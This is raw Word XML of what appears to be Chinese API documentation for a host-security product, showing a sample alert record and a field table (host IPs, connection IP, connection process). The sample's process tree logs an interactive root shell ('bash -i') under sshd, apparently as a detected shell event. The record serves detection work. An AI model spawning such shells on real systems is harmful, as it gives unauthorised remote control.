      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@pts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/19    "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 44340,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 44382,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/bin/bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "-bash "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ppid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 44382,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 21794,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/bin/bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "name": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "100755",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>euidUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D0B6B"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694"/>
        <w:gridCol w:w="2042"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3032"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="30648CB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2EBD772" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB50682" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67C777C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A49E860" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A012D69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C77C451" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39B31DDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="278D50DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73644D94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="269679EC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A37FEB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6133B00F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16F619C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A47911A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="301638EE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D026BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D6A9F29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E68CFD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F982A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="75D4135E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F92CA64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D6B468E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377E8277" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B5FD0A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AC908ED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63F7FDA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BCAB6ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD871F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C992910" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D32D43B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D685C31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67A59373" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56167FD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38332583" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12DF3410" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42049368" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4497CA8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E429842" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BD7DA52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A7960F8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17DD0D1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164C5645" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099654E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="674418D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D417A1E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D89EFC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC04511" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E265140" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F07E74D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AE2E30F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F6C890" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D78F2F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="140CA4A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="441453E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63E695D7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D2DAE1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C7D4515" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CD01976" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="766D8DD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17C60CEB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="200F5052" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06890CE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52C05C05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389719D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C40FF34" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
